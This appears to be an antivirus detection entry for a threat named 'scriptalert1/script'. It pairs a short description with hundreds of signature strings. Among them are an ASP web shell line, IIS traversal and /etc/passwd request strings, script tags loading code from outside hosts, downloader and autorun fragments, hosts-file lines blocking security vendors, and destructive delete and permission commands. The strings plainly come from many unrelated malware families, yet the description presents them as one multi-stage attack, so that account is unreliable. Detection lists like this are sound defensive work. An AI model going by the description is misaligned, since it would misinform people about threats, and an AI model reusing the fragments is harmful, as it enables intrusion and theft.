This threat, identified as scriptalert1/script, appears to be a sophisticated multi-stage attack primarily focused on credential harvesting and system compromise. It utilizes JavaScript to present fake login pages for phishing, while simultaneously attempting to establish deep system persistence and stealth through interactions with system service tables and references to the known 'LuoXue' rootkit. The malware likely drops malicious executables and may attempt to interact with SQL databases for data exfiltration.
Relevant strings associated with this threat:
- Provider=SQLOLEDB.1;Password= (PEHSTR_EXT)
- javascript:enviaUrl (PEHSTR_EXT)
- javascript:cadastroSenhas() (PEHSTR_EXT)
- \liberaplug.log (PEHSTR_EXT)
- KeServiceDescriptorTable (PEHSTR_EXT)
- \\.\LuoXue (PEHSTR_EXT)
- \drivers\beep.sys (PEHSTR_EXT)
- C:\Program Files\jjueA.exe (PEHSTR_EXT)
- C:\Program Files\jjueB.exe (PEHSTR_EXT)
- C:\Program Files\jjueC.exe (PEHSTR_EXT)
- \Xue.exe (PEHSTR_EXT)
- ServiceDescriptorTable (PEHSTR_EXT)
- fcomip (PEHSTR_EXT)
- fucomip (PEHSTR_EXT)
- javascript:'<html><head><title>Members Area Access</title></head><body><big><center><br><br>Save the login and password generated for you. It will grant access for 7 days.<br><br>Your LOGIN is: <b> (PEHSTR)
- </b><br>Your PASSWORD is: <b> (PEHSTR)
- "</b><br>Members Area URL: <a href= (PEHSTR)
- N</a><br><br>To access use your usual connection.</center></big></body></html>' (PEHSTR)
- scripts/%2e (PEHSTR)
- \Hide_Src\ (PEHSTR_EXT)
- <description>PC Monitoring Software</description> (PEHSTR_EXT)
- DI'm sorry, this application will not run while Soft-Ice is running. (PEHSTR_EXT)
- SystemRoot\system32\drivers (PEHSTR_EXT)
- kav.dll (PEHSTR_EXT)
- Device\KWatch (PEHSTR_EXT)
- promo.dollarrevenue.com (PEHSTR_EXT)
- <script language="JavaScript" type="text/JavaScript" src=" http://promo.dollarrevenue.com/drsmartload_js.asp?id= (PEHSTR_EXT)
- loadfirst=0&recurrence=always&retry=2&retry_mes=You%20must%20click%20Yes%20to%20access%20this%20content"></script><script language="JavaScript" type="text/JavaScript"> self.focus();"></script> (PEHSTR_EXT)
- c:\drsmartload1.exe (PEHSTR_EXT)
- %s\drsmartload2.dat (PEHSTR_EXT)
- SOFTWARE\Microsoft\drsmartload2 (PEHSTR_EXT)
- SOFTWARE\Microsoft\DownloadManager (PEHSTR_EXT)
- %%comspec%% (PEHSTR_EXT)
- del /F /Q "%%1 (PEHSTR_EXT)
- del /F /Q "%s (PEHSTR_EXT)
- %sdelme.bat (PEHSTR_EXT)
- 9348.cn (PEHSTR_EXT)
- 6700.cn (PEHSTR_EXT)
- 3929.cn (PEHSTR_EXT)
- 2548.cn (PEHSTR_EXT)
- kzxf.net (PEHSTR_EXT)
- www.9348.cn (PEHSTR_EXT)
- action="http://'+domain+'/search.php" method=getd (PEHSTR_EXT)
- formWeb.ww.value=text; Bx();d (PEHSTR_EXT)
- s=escape(formWeb.ww.value);d (PEHSTR_EXT)
- <script language=javascript> (PEHSTR_EXT)
- Explorer\IEXPLORE.EXE (PEHSTR_EXT)
- \drivers\etc\hosts (PEHSTR_EXT)
- css.css (PEHSTR_EXT)
- \config.ini (PEHSTR_EXT)
- \tempIcon.exe (PEHSTR_EXT)
- [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell (PEHSTR_EXT)
- :\autorun.inf (PEHSTR_EXT)
- <script language="javascript" src="http://% (PEHSTR_EXT)
- .HTML (PEHSTR_EXT)
- .ASPX (PEHSTR_EXT)
- Windows\CurrentVersion\Run (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\%s (PEHSTR_EXT)
- script (PEHSTR_EXT)
- delt.bat (PEHSTR_EXT)
- HOOK_DLL (PEHSTR_EXT)
- SOFTWARE\Kazaa (PEHSTR_EXT)
- ol.Application.GetNamespace('MAPI') (PEHSTR_EXT)
- Software\Microsoft\WAB\DLLPath (PEHSTR_EXT)
- cmd /C cscript (PEHSTR_EXT)
- nobody@nowhere.com (PEHSTR_EXT)
- <script language="javascript" src= (PEHSTR_EXT)
- shellexecute= (PEHSTR_EXT)
- shell\Auto\command= (PEHSTR_EXT)
- Objects\{BA12780E-B91E-41A7-A51A-528CBD64284E (PEHSTR_EXT)
- Objects\{4136F291-C429-49C1-9B08-4B9C9DE4DEB6 (PEHSTR_EXT)
- Objects\{E89097ED-3400-411D-9647-D368C3311C98 (PEHSTR_EXT)
- http://zopabora.info/ssoft/softadmin.php (PEHSTR_EXT)
- http:// (PEHSTR_EXT)
- .biz/adminsscript/softadmin.php (PEHSTR_EXT)
- get_2execute (PEHSTR_EXT)
- http://zopabora.info (PEHSTR_EXT)
- v0.005 (PEHSTR_EXT)
- %d%d%d%d%d.%s (PEHSTR_EXT)
- C:\InjectedCode.part0 (PEHSTR_EXT)
- ntoskrnl.exe (PEHSTR_EXT)
- userinit.exe (PEHSTR_EXT)
- wwwa.5009.cn (PEHSTR_EXT)
- wwwb.5009.cn (PEHSTR_EXT)
- wwwc.5009.cn (PEHSTR_EXT)
- wwwd.5009.cn (PEHSTR_EXT)
- wwwe.5009.cn (PEHSTR_EXT)
- wwwf.5009.cn (PEHSTR_EXT)
- wwwg.5009.cn (PEHSTR_EXT)
- www.haol23.net (PEHSTR_EXT)
- 4199.5009.cn (PEHSTR_EXT)
- c:\me.mp3 (PEHSTR_EXT)
- C:\ali.html (PEHSTR_EXT)
- AntiSpyware.exe (PEHSTR_EXT)
- spywaredoctor.dll (PEHSTR_EXT)
- System32\drivers\ssl (PEHSTR_EXT)
- System32\drivers\ssl\06 (PEHSTR_EXT)
- C:\WINDOWS\spywaredoctor.dll (PEHSTR_EXT)
- C:\WINDOWS\System32\drivers\ssl (PEHSTR_EXT)
- C:\WINDOWS\System32\drivers\ssl\06 (PEHSTR_EXT)
- FindExecutableA (PEHSTR_EXT)
- Stop/Play Music (PEHSTR)
- www.dayanzai.me (PEHSTR)
- Software\ASProtect\Key (PEHSTR)
- aspr_keys.ini (PEHSTR)
- FastTracker v2.00 (PEHSTR)
- ghidorah@musician.org (PEHSTR)
- http://www.CollakeSoftware.com (PEHSTR)
- com.embarcadero.EaseUS_DRW (PEHSTR_EXT)
- EaseUS_DRW.exe (PEHSTR_EXT)
- \Corel\StubFramework\VSP (PEHSTR_EXT)
- Keygen.exe (PEHSTR_EXT)
- secure.nch.com.au (PEHSTR_EXT)
- www.nchsoftware.com (PEHSTR_EXT)
- GfX done By fStD/cRo (PEHSTR_EXT)
- <description>Patch</description> (PEHSTR_EXT)
- dup2patcher.dll (PEHSTR_EXT)
- WELCOME TO ANOTHER NICE KEYGEN FROM YOUR FRIENDS AT EDGE (PEHSTR_EXT)
- Gen. Serial (PEHSTR_EXT)
- Nice music composed by (PEHSTR_EXT)
- /aff-light/affcgi/installed.fcgi?userid=20001 (PEHSTR_EXT)
- /aff-light/affcgi/install.php?userid=20001 (PEHSTR_EXT)
- \ServicePackFiles\i386\mswsock.dll (PEHSTR_EXT)
- http://litlemouse.info/a/49.dat (PEHSTR_EXT)
- /cgi-script/repeaterm3.fcgi?v5 (PEHSTR_EXT)
- Content-Type: image/x-gif (PEHSTR_EXT)
- Content-Type: image/gif (PEHSTR_EXT)
- \dllcache\mswsock.dll (PEHSTR_EXT)
- \mswsockhh.dll (PEHSTR_EXT)
- gif/chgif.exe (PEHSTR_EXT)
- \mswsock.bak (PEHSTR_EXT)
- png/png.exe (PEHSTR_EXT)
- jpg/jpg.exe (PEHSTR_EXT)
- chgif.exe (PEHSTR_EXT)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv: (PEHSTR_EXT)
- javascript:top.parent.location='http:// (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR_EXT)
- http://www.aol.com/ (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR)
- !<%execute request("jokeyou")&""%> (PEHSTR)
- P<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script> (PEHSTR)
- :\autorun.inf (PEHSTR)
- :\RECYCLER.exe (PEHSTR)
- Update.exe (PEHSTR)
- Upgrade.exe (PEHSTR)
- open=RECYCLER.exe (PEHSTR)
- shellexecute=RECYCLER.exe (PEHSTR)
- shell\Auto\command=RECYCLER.exe (PEHSTR)
- MONSYSNT.EXE (PEHSTR)
- SPIDERNT.EXE (PEHSTR)
- ICESWORD.EXE (PEHSTR)
- drivers\etc\hosts (PEHSTR_EXT)
- Hardware\Description\System\CentralProcessor\0 (PEHSTR_EXT)
- 172.16 (PEHSTR_EXT)
- 192.168 (PEHSTR_EXT)
- application/octet-stream (PEHSTR_EXT)
- <td align="right">%dKb</td> (PEHSTR_EXT)
- /Set HTTPGET = CreateObject("Microsoft.XMLHTTP") (PEHSTR)
- -Set SendBinary = CreateObject("ADODB.Stream") (PEHSTR)
- DataBin = HTTPGET.ResponseBody (PEHSTR)
- wscript.exe /B (PEHSTR)
- cscript.exe /B (PEHSTR)
- HTTPGET.Send (PEHSTR)
- mshta.exe (PEHSTR)
- ExeScript Host (PEHSTR)
- d:\Works\ByShell_Up19 (PEHSTR_EXT)
- byshell_bypass_sys\bypass\i386\bypass.pdb (PEHSTR_EXT)
- ByShell_Up19\DarkShell\Release\DarkShell.pdb (PEHSTR_EXT)
- Software\SteelKernel (PEHSTR_EXT)
- ntkrnlpa.exe (PEHSTR_EXT)
- ntkrpamp.exe (PEHSTR_EXT)
- ntkrnlmp.exe (PEHSTR_EXT)
- mail.mindspring.com (PEHSTR_EXT)
- lsas.exe (PEHSTR_EXT)
- csrss.dll (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Rund (PEHSTR_EXT)
- SOFTWARE\TENCENT\PLATFORM_TYPE_LIST (PEHSTR_EXT)
- TIMPlatform.exe (PEHSTR_EXT)
- Drivers\usbinte.sys (PEHSTR_EXT)
- exefile\shell\open\command (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (PEHSTR_EXT)
- 127.0.0.1 scan.kingsoft.com (PEHSTR_EXT)
- 127.0.0.1 update.rising.com.cn (PEHSTR_EXT)
- 127.0.0.1 download.rising.com.cn (PEHSTR_EXT)
- .kaspersky-labs.com (PEHSTR_EXT)
- PsCreateSystemThread (PEHSTR_EXT)
- http://xsearchz.com/script.php (PEHSTR_EXT)
- http://65.243.103.62/go/?cmp=vmtek_alexvs&lid=%s&uid=%s&guid=%s (PEHSTR_EXT)
- Global\vmc_term (PEHSTR_EXT)
- explorer.exe (PEHSTR_EXT)
- services.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows (PEHSTR_EXT)
- rundll32.exe "%s",B2 (PEHSTR_EXT)
- LoadAppInit_DLLs (PEHSTR_EXT)
- /scripts/worker.php (PEHSTR_EXT)
- action=get%5Fscript& (PEHSTR_EXT)
- KeServiceDescriptorT (PEHSTR_EXT)
- \ps.dat (PEHSTR_EXT)
- \alog.txt (PEHSTR_EXT)
- \accs.txt (PEHSTR_EXT)
- \boa.dat (PEHSTR_EXT)
- \commands.xml (PEHSTR_EXT)
- \commandhelper.xml (PEHSTR_EXT)
- \nethelper.xml (PEHSTR_EXT)
- \nethelper2.xml (PEHSTR_EXT)
- \helper.xml (PEHSTR_EXT)
- \helper2.xml (PEHSTR_EXT)
- \helper.dll (PEHSTR_EXT)
- \nethelper.dll (PEHSTR_EXT)
- \nethelper2.dll (PEHSTR_EXT)
- mailscript (PEHSTR_EXT)
- newuserscript (PEHSTR_EXT)
- ackcommandscript (PEHSTR_EXT)
- commandscript (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- KeServiceDescriptorTa (PEHSTR_EXT)
- iedefender.com (PEHSTR_EXT)
- divx.dll (PEHSTR_EXT)
- DllCanUnload (PEHSTR_EXT)
- live.com (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorA (PEHSTR_EXT)
- <script language="JavaScript (PEHSTR_EXT)
- ">window.location=" (PEHSTR_EXT)
- DllCanUnloadNow (PEHSTR_EXT)
- \\.\Runtime (PEHSTR_EXT)
- Scriptor: Success interpretate script. (PEHSTR_EXT)
- Fail START RegAcc. (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Active Setup\Installed Components\%s (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- SOFTWARE\Classes\HTTP\shell\open\command (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- umxtray.exe (PEHSTR_EXT)
- kavsvc.exe (PEHSTR_EXT)
- Class Hierarchy Descriptor (PEHSTR)
- enqvwkp.DLL (PEHSTR)
- \DosDevices\c:\name.log (PEHSTR_EXT)
- GameHack\ (PEHSTR_EXT)
- KeServiceDescriptorTable (PEHSTR)
- .GameHack\HookDllDriver\objfre\i386\hookdll.pdb (PEHSTR)
- 9RING0EXE (PEHSTR)
- tempdir.exe (PEHSTR)
- %s\drivers\%s (PEHSTR)
- ntdll.dll (PEHSTR)
- edfqvrw.DLL (PEHSTR)
- emotrlq.DLL (PEHSTR)
- \objfre\i386\hookdll.pdb (PEHSTR_EXT)
- _jS^f (PEHSTR_EXT)
- D:\Soft\Smr\ (PEHSTR_EXT)
- \pchide\ (PEHSTR_EXT)
- ENUM\ROOT (PEHSTR_EXT)
- \prueba\miprueba\Bin\ (PEHSTR_EXT)
- Class Hierarchy Descriptor2 (PEHSTR)
- KERNEL32.DLL (PEHSTR)
- SOFTWARE\Borland\Delphi\RTLd (PEHSTR)
- \svchost.scr (PEHSTR)
- /scripts/engine_brpi.dll (PEHSTR)
- rauber2@isbt.com.br (PEHSTR)
- Banco Bradesco S/A (PEHSTR)
- http://www.nuclearwinter.us (PEHSTR)
- javascript:history.go(-1); (PEHSTR)
- address. (PEHSTR_EXT)
- COMMAND: (PEHSTR_EXT)
- -codered 192.16 (PEHSTR_EXT)
- -webdav 192.168.0.1 192.168.0.255 (PEHSTR_EXT)
- GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+d (PEHSTR_EXT)
- /cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 (PEHSTR_EXT)
- cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs (PEHSTR_EXT)
- SOFTWARE\TENCENT\ (PEHSTR_EXT)
- Explorer.exe (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\protected\AVP7\profiles\AVService\settings\Excludes\0000\VerdictPath (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\protected\AVP7\profiles\AVService\settings\Excludes\0000\TaskList (PEHSTR_EXT)
- SOFTWARE\KasperskyLab\protected\AVP7\profiles\AVService\settings\Excludes\0000\Object (PEHSTR_EXT)
- \\.\RESSDTDOS (PEHSTR_EXT)
- http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q= (PEHSTR_EXT)
- javascript:enviar() (PEHSTR_EXT)
- \Desktop\Shark\Projekt (PEHSTR_EXT)
- Set FileSystemObject = CreateObject("scripting.filesystemobject") (PEHSTR_EXT)
- Software\Microsoft\Internet Explorer\Toolbar (PEHSTR_EXT)
- Set Shell = CreateObject("Wscript.Shell") (PEHSTR_EXT)
- taskkill /f /im (PEHSTR_EXT)
- exefile\shell\Open\Command (PEHSTR_EXT)
- piffile\shell\Open\Command (PEHSTR_EXT)
- F:\10.song\code\code\ (PEHSTR_EXT)
- \driver\objfre\i386\autolive.pdb (PEHSTR_EXT)
- %%systemroot%%\system32\Rundll32.exe %%systemroot%%\system32\%s.dll (PEHSTR_EXT)
- DllUnregisterServer (PEHSTR_EXT)
- %%systemroot%%\system32\regsvr32.exe /s %%systemroot%%\system32\%s.dll (PEHSTR_EXT)
- \SystemRoot\system32\drivers\%ws.sys (PEHSTR_EXT)
- \SystemRoot\system32\%ws.dll (PEHSTR_EXT)
- \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk (PEHSTR_EXT)
- %SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR_EXT)
- Applications\iexplore.exe\shell\open\command (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\%s (PEHSTR_EXT)
- ServiceDllUnloadOnStop (PEHSTR_EXT)
- agent_dq.dll (PEHSTR)
- ShellExecuteA (PEHSTR)
- :<description>My Office Addin built with .Net</description> (PEHSTR)
- \system32\drivers\beep.bin (PEHSTR_EXT)
- w1.bat (PEHSTR_EXT)
- AppInit_DLLs (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- HM_MESSWOWHHHDLL (PEHSTR_EXT)
- HM_MESSWMGJHCHDLL (PEHSTR_EXT)
- SYSTEM\ControlSet001\Services\ (PEHSTR_EXT)
- Description (PEHSTR_EXT)
- \Parameters (PEHSTR_EXT)
- ServiceDll (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost (PEHSTR_EXT)
- svchost.exe -k netsvcs (PEHSTR_EXT)
- \ntoskrnl.exe (PEHSTR_EXT)
- \i386\rising.sys (PEHSTR_EXT)
- \i386\nod32 (PEHSTR_EXT)
- jnjejdjdjijHjrjejpjujSjwjojhjS (PEHSTR)
- jsj/PjdjrPjcj/Pjejxjej.jdjmjc (PEHSTR)
- jfjijpj.jejljijfjejgjajp (PEHSTR)
- %s\dnsq.dll (PEHSTR)
- %s\037589.log (PEHSTR)
- %s\NetApi000.sys (PEHSTR)
- shell\open\Command=pagefile.pif (PEHSTR)
- NSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden (PEHSTR)
- cmd.exe /c del /F /Q " (PEHSTR)
- !attrib "C:\myapp.exe" -r -a -s -h (PEHSTR)
- 360TraY.exe (PEHSTR)
- soul*exe (PEHSTR)
- Dsoftware\Microsoft\Windows\CurrentVersion\exploRER\ShellexecuteHooks (PEHSTR)
- Ravmond.exe (PEHSTR)
- avp.exe (PEHSTR)
- >VmImgDescriptor (PEHSTR_EXT)
- \\.\ITNDriver (PEHSTR_EXT)
- keys.log (PEHSTR_EXT)
- SAM\A (PEHSTR_EXT)
- \shell\open\command (PEHSTR_EXT)
- ExecuteFile (PEHSTR_EXT)
- Screenshot (PEHSTR_EXT)
- timxbqj/emm (PEHSTR_EXT)
- Windows\CurrentVersion\Run\ (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR)
- \xcopy.exe (PEHSTR_EXT)
- ServiceDLL (PEHSTR_EXT)
- .\RESSDTDOS (PEHSTR_EXT)
- %SystemRoot%\System32\BFDDos.dll (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- COMSPEC (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\W32Time\Parameters (PEHSTR_EXT)
- IofCompleteRequest (PEHSTR_EXT)
- \systemroot\system32\%s (PEHSTR_EXT)
- KeDelayExecutionThread (PEHSTR_EXT)
- .text (PEHSTR_EXT)
- h.data (PEHSTR_EXT)
- .reloc (PEHSTR_EXT)
- WinExec (PEHSTR_EXT)
- %SystemRoot%\system32\svchost.exe -k netsvcs (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\ (PEHSTR_EXT)
- cmd /c d (PEHSTR_EXT)
- \driver\bypass\bypass\i386\bypass.pdb (PEHSTR_EXT)
- /c del %s > nul (PEHSTR_EXT)
- NetBot\i386\ (PEHSTR_EXT)
- ntoskrnl.exe (PEHSTR)
- \code\RESSDT\i386\RESSDT.pdb (PEHSTR_EXT)
- ibtpsviv.ibi (PEHSTR_EXT)
- rxovrpte.ibi (PEHSTR_EXT)
- qwhr76.xpj (PEHSTR_EXT)
- PsCreateSystemThread (PEHSTR)
- \AntiDriver.pdb (PEHSTR)
- \XNG_AntiVersion (PEHSTR)
- \Device\XNGAnti (PEHSTR)
- \winddk\src\hookint (PEHSTR_EXT)
- \HideDriver.pdb (PEHSTR_EXT)
- \1\i386\RESSDT.pdb (PEHSTR_EXT)
- javascript:ValidaSenha( (PEHSTR_EXT)
- 0<script language="javascript" src="%s"></script> (PEHSTR)
- 91.142.67.51 (PEHSTR)
- 194.126.193.161 (PEHSTR)
- 209.167.111.110 (PEHSTR)
- (http://%s/rjsa/select.php?a=%s&b=%d&c=%d (PEHSTR)
- \win.dll\std.txt (ASEP_FILEPATH)
- )Software\Microsoft\Internet Explorer\Main (PEHSTR)
- )7search.com/scripts/security/validate.asp (PEHSTR)
- 0Software\Microsoft\Internet Explorer\New Windows (PEHSTR)
- grdsfsd.bat (PEHSTR)
- http://66.199.179.8/search.php (PEHSTR)
- 66.250.74.152/kw_img/img_gen.php (PEHSTR)
- *http://tripborn.org/rd/rep2.php?er[0]=5.1- (PEHSTR)
- *http://firstwolf.org/rd/rep.php?er[0]=5.1- (PEHSTR)
- www.suurch.com (PEHSTR)
- UhellExecuteA (PEHSTR)
- vimg.php? (PEHSTR)
- \hack_da_ipd (PEHSTR)
- \SYSTEM32\_tdiserv_\svchost.exe (PEHSTR)
- \TdiUpdate.sys (PEHSTR)
- \\.\TdiTransferClient (PEHSTR)
- qC:\WINDOWS\system32\reg.exe delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v mssysif /f (PEHSTR)
- Vreg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /t REG_SZ (PEHSTR)
- 1window.status='Done';document.write('<iframe id= (PEHSTR)
- 9<script>function v(.*)1793A6E6F6E65273E3C2F696672616D653E (PEHSTR)
- \config\jute.vbs (FILEPATH)
- \config\vip.html (FILEPATH)
- \config\index.html (FILEPATH)
- \config\token.html (FILEPATH)
- \config\index2.html (FILEPATH)
- \config\principa.js (FILEPATH)
- \config\empresas.html (FILEPATH)
- \config\personas.html (FILEPATH)
- \config\bcp\index.html (FILEPATH)
- \config\css\estilo.css (FILEPATH)
- \config\images\logo.gif (FILEPATH)
- \config\images\fl_nar.gif (FILEPATH)
- \config\images\spacer.gif (FILEPATH)
- \config\images\fl_blan.gif (FILEPATH)
- \config\images\prine01.jpg (FILEPATH)
- \config\scripts\scripts.js (FILEPATH)
- \config\styles\estilos.css (FILEPATH)
- \config\styles\viabcp1.css (FILEPATH)
- \config\css\portada_new.css (FILEPATH)
- \config\images\esq_azul.gif (FILEPATH)
- Software\Microsoft\Windows\CurrentVersion\Setup\poop (PEHSTR_EXT)
- \*ad*txt (PEHSTR_EXT)
- .php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%d (PEHSTR_EXT)
- SCROLLING=NO WIDTH="%d" HEIGHT="%d" SRC="%s"></IFRAME> (PEHSTR_EXT)
- <script src="%s"></script> (PEHSTR_EXT)
- ping.php/%d/%d (PEHSTR_EXT)
- rjsa/select.php (PEHSTR_EXT)
- rjsa/select.php (PEHSTR)
- 216.95.196.22 (PEHSTR)
- \*ad*txt (PEHSTR)
- <script src="%s"></script> (PEHSTR)
- www.345dh.cn (PEHSTR)
- www.hahapage.cn (PEHSTR)
- 127.0.0.2 localhost (PEHSTR)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
- TaskKill /pid (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinNotify (PEHSTR_EXT)
- SetSecurityDescriptorDacl (PEHSTR_EXT)
- cmd /c cacls "%s" /e /p everyone:f (PEHSTR_EXT)
- 360tray.exe (PEHSTR_EXT)
- \update.dll (PEHSTR_EXT)
- rundll32.exe %s, drop (PEHSTR_EXT)
- %s\admin$\ (PEHSTR_EXT)
- rs=createObject("Wscript.shell") (PEHSTR_EXT)
- GET /scripts/get_command.php?name= (PEHSTR_EXT)
- gamunkul.com (PEHSTR_EXT)
- \driver.pdb (PEHSTR_EXT)
- hooking.cpp: SST index (PEHSTR_EXT)
- %s%itmp.exe (PEHSTR)
- http://bot: (PEHSTR)
- http_download() (PEHSTR)
- hide_evr2.pdb (PEHSTR_EXT)
- +shellexecute=Wscript.exe /e:vbs Dalifit.jpg (PEHSTR)
- flashdrive.path &"\autorun.inf (PEHSTR)
- Global\gool %d (PEHSTR_EXT)
- IEXPLORE.EXE (PEHSTR_EXT)
- INETCPL.CPL (PEHSTR_EXT)
- 127.0.0.2 (PEHSTR_EXT)
- www.5566dh.cn (PEHSTR_EXT)
- ls0ss.exe (PEHSTR_EXT)
- escriptorTable (PEHSTR_EXT)
- +set Guelmim = createobject("Wscript.shell") (PEHSTR)
- %http://www.julysoft.cn/data/data.html (PEHSTR)
- julysoft.exe (PEHSTR)
- javascript: (PEHSTR)
- about.ini (PEHSTR)
- 'http://www.julysoft.cn/data/about.html? (PEHSTR)
- .http://www.julysoft1.cn/data/tj/count.php?MAC= (PEHSTR)
- dllcache\cisvc.exe (PEHSTR)
- http://www.julysoft (PEHSTR_EXT)
- .cn/data/ip.php (PEHSTR_EXT)
- .cn/data/LL.txt (PEHSTR_EXT)
- LLConfig.ini (PEHSTR_EXT)
- .cn/data/DJ.txt (PEHSTR_EXT)
- DJConfig.inid (PEHSTR_EXT)
- .cn/data/tj/count.php?MAC= (PEHSTR_EXT)
- \Media\Windows Navigation Start.wav (PEHSTR_EXT)
- .cn/data/TC.txt (PEHSTR_EXT)
- TCConfig.ini (PEHSTR_EXT)
- .us - stopped sending (PEHSTR_EXT)
- /secure/index_new.php?id= (PEHSTR_EXT)
- javascript:RunAntivirus() (PEHSTR_EXT)
- blocked forever.</b><br> (PEHSTR_EXT)
- pugalka.dll (PEHSTR_EXT)
- DllCanUn (PEHSTR_EXT)
- = new ActiveXObject("OWC10.Spreadsheet"); (PEHSTR_EXT)
- <script src="off.js"></script> (PEHSTR_EXT)
- ++){try{obj.msDataSourceObject( (PEHSTR_EXT)
- exe.ecivreserawmv (PEHSTR_EXT)
- ./DRAT/ (PEHSTR_EXT)
- &del %systemroot%\system32\iniuser1.exe (PEHSTR)
- !del %systemroot%\system32\ftp.exe (PEHSTR)
- "del %systemroot%\system32\tftp.exe (PEHSTR)
- %del %systemroot%\system32\cscript.exe (PEHSTR)
- &del %systemroot%\system32\msconfig.exe (PEHSTR)
- del %systemroot%\system32\at.exe (PEHSTR)
- #del %systemroot%\system32\query.exe (PEHSTR)
- *del %systemroot%\system32\iniuser1stat.exe (PEHSTR)
- iniuser1 user kevin /del (PEHSTR)
- iniuser1 user iisadmin /del (PEHSTR)
- Kill.bat (PEHSTR)
- \\.\https (PEHSTR_EXT)
- plugin/script_n.php?code= (PEHSTR_EXT)
- go/count.php?go= (PEHSTR_EXT)
- C:\boot.bin (PEHSTR_EXT)
- systemp.log (PEHSTR_EXT)
- sysout.log (PEHSTR_EXT)
- zzzstopit.txt (PEHSTR)
- ,Set zzzshll = Createobject ("Wscript.Shell") (PEHSTR)
- _zzzshll.regwrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS Office") (PEHSTR)
- http://xies.ru/?id=1 (PEHSTR)
- http://xies.ru/?id=3 (PEHSTR)
- \Kav.key (PEHSTR)
- [%d/%d/%d %d:%d:%d] (%s) (PEHSTR)
- .mICROSOFT\nETWORK\cONNECTIONS\PBK\RASPHONE.PBK (PEHSTR)
- ,aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND (PEHSTR)
- c:\users\icyheart\docume~1\visual~ (PEHSTR_EXT)
- \projects\download\ (PEHSTR_EXT)
- Unit_ScreenSpy (PEHSTR_EXT)
- D:\PROGRA~1\WinRAR\dodo.vbs (PEHSTR_EXT)
- %s\%s (PEHSTR_EXT)
- adminlog.exe (PEHSTR_EXT)
- RavMonD.exe (PEHSTR_EXT)
- Wscript.Sleep 300000 (PEHSTR_EXT)
- GET /script.php?t=%u&a= (PEHSTR_EXT)
- \srenum.pdb (PEHSTR_EXT)
- exn.Write strlnk & "[g]" & tmcca (PEHSTR)
- ffso.copyfile wsh.ExpandEnvironmentStrings("%WINDIR%\system32\")&"wscript.exe",pathn & "Ntype.exe",true (PEHSTR)
- +Set MyShell = CreateObject("Wscript.Shell") (PEHSTR)
- \Autorun.vbs (PEHSTR)
- http://checkip.dyndns.org (PEHSTR)
- system32\ime\ping -n (PEHSTR)
- ?echo WScript.CreateObject(^"WScript.Shell^").Run(^"cmd /c xcopy (PEHSTR)
- <echo CreateObject("wscript.shell").run "cmd.exe /c regedit/s (PEHSTR)
- /CallBack/SomeScripts/ (PEHSTR_EXT)
- /perl/scripts/errorMG.pl (PEHSTR_EXT)
- .php?socks_id=%d&check25=%d (PEHSTR_EXT)
- at/wt=%lu/%lu (PEHSTR_EXT)
- t/s=%lu/%lu (PEHSTR_EXT)
- urec/arec=%lu/%lu(msec) (PEHSTR_EXT)
- %MYFILES%\in.exe (PEHSTR)
- http://stat.02933.com (PEHSTR)
- Emshta vbscript:createobject("wscript.shell").run("""iexplore""http:// (PEHSTR)
- \360safe.exe (PEHSTR)
- \KSWebShield.exe (PEHSTR)
- \kws.ini (PEHSTR)
- IGNORE6=javascript:history.back(1) (PEHSTR_EXT)
- sitenet.serasa.com.br/elementos_estrutura/login (PEHSTR_EXT)
- santander.com.br/portal/wps/script (PEHSTR_EXT)
- bankline.itau.com.br/lgnet (PEHSTR_EXT)
- /c "wscript.exe /B "%userprofile%\ (PEHSTR_EXT)
- .vbs"" (PEHSTR_EXT)
- a/clickscript.txt (PEHSTR_EXT)
- HExec (PEHSTR_EXT)
- \*.dll (PEHSTR_EXT)
- :555/sorttable.js></script> (PEHSTR_EXT)
- cscript /NoLogo /B (PEHSTR_EXT)
